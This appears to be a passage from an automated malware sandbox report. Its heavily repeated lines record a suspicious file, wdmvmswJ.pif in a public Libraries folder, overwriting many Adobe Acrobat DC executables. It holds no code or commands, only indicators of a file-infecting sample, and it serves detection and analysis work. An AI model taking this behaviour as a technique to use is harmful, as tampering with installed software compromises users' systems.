                Source: C:\Users\Public\Libraries\wdmvmswJ.pifFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRLogTransport.exeJump to behavior
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRLogTransport.exeJump to behavior
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRLogTransport.exeJump to behavior
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRWindowsClientService.exeJump to behavior
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRWindowsClientService.exeJump to behavior
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRWindowsClientService.exeJump to behavior
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRWindowsClientService.exeJump to behavior
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRWindowsClientService.exeJump to behavior
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRWindowsClientService.exeJump to behavior
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRWindowsClientService.exeJump to behavior
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRWindowsClientService.exeJump to behavior
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRWindowsClientService.exeJump to behavior
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRWindowsClientService.exeJump to behavior
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRWindowsClientService.exeJump to behavior
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRWindowsClientService.exeJump to behavior
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRWindowsClientService.exeJump to behavior
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRWindowsClientService.exeJump to behavior
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Eula.exeJump to behavior
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Eula.exeJump to behavior
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Eula.exeJump to behavior
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Eula.exeJump to behavior
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Eula.exeJump to behavior
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Eula.exeJump to behavior
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Eula.exeJump to behavior
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Eula.exeJump to behavior
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Eula.exeJump to behavior
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Eula.exeJump to behavior
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Eula.exeJump to behavior
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Eula.exeJump to behavior
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Eula.exeJump to behavior
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Eula.exeJump to behavior
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\LogTransport2.exeJump to behavior
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\LogTransport2.exeJump to behavior
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\LogTransport2.exeJump to behavior
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\LogTransport2.exeJump to behavior
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\LogTransport2.exeJump to behavior
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\LogTransport2.exeJump to behavior
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\LogTransport2.exeJump to behavior
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\LogTransport2.exeJump to behavior
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\LogTransport2.exeJump to behavior
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\LogTransport2.exeJump to behavior
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\LogTransport2.exeJump to behavior
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_acro.exeJump to behavior
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_acro.exeJump to behavior
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_acro.exeJump to behavior
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_acro.exeJump to behavior
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_acro.exeJump to behavior
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_acro.exeJump to behavior
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_acro.exeJump to behavior
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_acro.exeJump to behavior
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_acro.exeJump to behavior
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_acro.exeJump to behavior
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_acro.exeJump to behavior
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exeJump to behavior
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exeJump to behavior
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exeJump to behavior
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exeJump to behavior
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exeJump to behavior
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exeJump to behavior
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exeJump to behavior
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exeJump to behavior
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exeJump to behavior
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exeJump to behavior
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exeJump to behavior
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exeJump to behavior
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exeJump to behavior
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exeJump to behavior
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\32BitMAPIBroker.exeJump to behavior
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\32BitMAPIBroker.exeJump to behavior
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\32BitMAPIBroker.exeJump to behavior
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\32BitMAPIBroker.exeJump to behavior
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\32BitMAPIBroker.exeJump to behavior
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\32BitMAPIBroker.exeJump to behavior
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\32BitMAPIBroker.exeJump to behavior
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\32BitMAPIBroker.exeJump to behavior
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\32BitMAPIBroker.exeJump to behavior
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\32BitMAPIBroker.exeJump to behavior
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\32BitMAPIBroker.exeJump to behavior
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\32BitMAPIBroker.exeJump to behavior
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\32BitMAPIBroker.exeJump to behavior
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\32BitMAPIBroker.exeJump to behavior
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\64BitMAPIBroker.exeJump to behavior
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\64BitMAPIBroker.exeJump to behavior
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\64BitMAPIBroker.exeJump to behavior
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\64BitMAPIBroker.exeJump to behavior
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\64BitMAPIBroker.exeJump to behavior
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\64BitMAPIBroker.exeJump to behavior
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\64BitMAPIBroker.exeJump to behavior
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\64BitMAPIBroker.exeJump to behavior
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\64BitMAPIBroker.exeJump to behavior
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\64BitMAPIBroker.exeJump to behavior
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\64BitMAPIBroker.exeJump to behavior
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\64BitMAPIBroker.exeJump to behavior
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\64BitMAPIBroker.exeJump to behavior
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\64BitMAPIBroker.exeJump to behavior
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\MSRMSPIBroker.exeJump to behavior
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\MSRMSPIBroker.exeJump to behavior
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\MSRMSPIBroker.exeJump to behavior
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\MSRMSPIBroker.exeJump to behavior
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\MSRMSPIBroker.exeJump to behavior
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\MSRMSPIBroker.exeJump to behavior
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\MSRMSPIBroker.exeJump to behavior
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\MSRMSPIBroker.exeJump to behavior
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\MSRMSPIBroker.exeJump to behavior
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\MSRMSPIBroker.exeJump to behavior
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\MSRMSPIBroker.exeJump to behavior
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\MSRMSPIBroker.exeJump to behavior
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\MSRMSPIBroker.exeJump to behavior
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\MSRMSPIBroker.exeJump to behavior
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\RDCNotificationClient\FullTrustNotifier.exeJump to behavior
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\RDCNotificationClient\FullTrustNotifier.exeJump to behavior
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\RDCNotificationClient\FullTrustNotifier.exeJump to behavior
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\RDCNotificationClient\FullTrustNotifier.exeJump to behavior
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\RDCNotificationClient\FullTrustNotifier.exeJump to behavior
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\RDCNotificationClient\FullTrustNotifier.exeJump to behavior
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\RDCNotificationClient\FullTrustNotifier.exeJump to behavior
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\RDCNotificationClient\FullTrustNotifier.exeJump to behavior
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\RDCNotificationClient\FullTrustNotifier.exeJump to behavior
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\RDCNotificationClient\FullTrustNotifier.exeJump to behavior
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\RDCNotificationClient\FullTrustNotifier.exeJump to behavior
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\RDCNotificationClient\FullTrustNotifier.exeJump to behavior
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\RDCNotificationClient\FullTrustNotifier.exeJump to behavior
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\RDCNotificationClient\FullTrustNotifier.exeJump to behavior
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ShowAppPickerForPDF.exeJump to behavior
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ShowAppPickerForPDF.exeJump to behavior
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ShowAppPickerForPDF.exeJump to behavior
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ShowAppPickerForPDF.exeJump to behavior
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ShowAppPickerForPDF.exeJump to behavior
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ShowAppPickerForPDF.exeJump to behavior
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ShowAppPickerForPDF.exeJump to behavior
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ShowAppPickerForPDF.exeJump to behavior
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ShowAppPickerForPDF.exeJump to behavior
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ShowAppPickerForPDF.exeJump to behavior
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ShowAppPickerForPDF.exeJump to behavior
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ShowAppPickerForPDF.exeJump to behavior
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ShowAppPickerForPDF.exeJump to behavior
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ShowAppPickerForPDF.exeJump to behavior
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\x86\Acrobat\Acrobat.exeJump to behavior
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\x86\Acrobat\Acrobat.exeJump to behavior
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\x86\Acrobat\Acrobat.exeJump to behavior
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\x86\Acrobat\Acrobat.exeJump to behavior
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\x86\Acrobat\Acrobat.exeJump to behavior
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\x86\Acrobat\Acrobat.exeJump to behavior
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\x86\Acrobat\Acrobat.exeJump to behavior
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\x86\Acrobat\Acrobat.exeJump to behavior
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\x86\Acrobat\Acrobat.exeJump to behavior
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\x86\Acrobat\Acrobat.exeJump to behavior
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\x86\Acrobat\Acrobat.exeJump to behavior
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifFile written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\setup.exeJump to behavior
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifFile written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\setup.exeJump to behavior
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifFile written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\setup.exeJump to behavior
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifFile written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\setup.exeJump to behavior
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifFile written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\setup.exeJump to behavior
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifFile written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\setup.exeJump to behavior
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifFile written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\setup.exeJump to behavior
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifFile written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\setup.exeJump to behavior
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifFile written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\setup.exeJump to behavior
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifFile written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\setup.exeJump to behavior
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifFile written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\setup.exeJump to behavior
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifFile written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\WindowsInstaller-KB893803-v2-x86.exeJump to behavior
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifFile written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\WindowsInstaller-KB893803-v2-x86.exeJump to behavior
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifFile written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\WindowsInstaller-KB893803-v2-x86.exeJump to behavior
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifFile written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\WindowsInstaller-KB893803-v2-x86.exeJump to behavior
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifFile written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\WindowsInstaller-KB893803-v2-x86.exeJump to behavior
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifFile written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\WindowsInstaller-KB893803-v2-x86.exeJump to behavior
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifFile written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\WindowsInstaller-KB893803-v2-x86.exeJump to behavior
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifFile written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\WindowsInstaller-KB893803-v2-x86.exeJump to behavior
                Source: C:\Users\Public\Libraries\wdmvmswJ.pifFile written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\WindowsInstaller-KB893803-v2-x86.exeJump to behavior
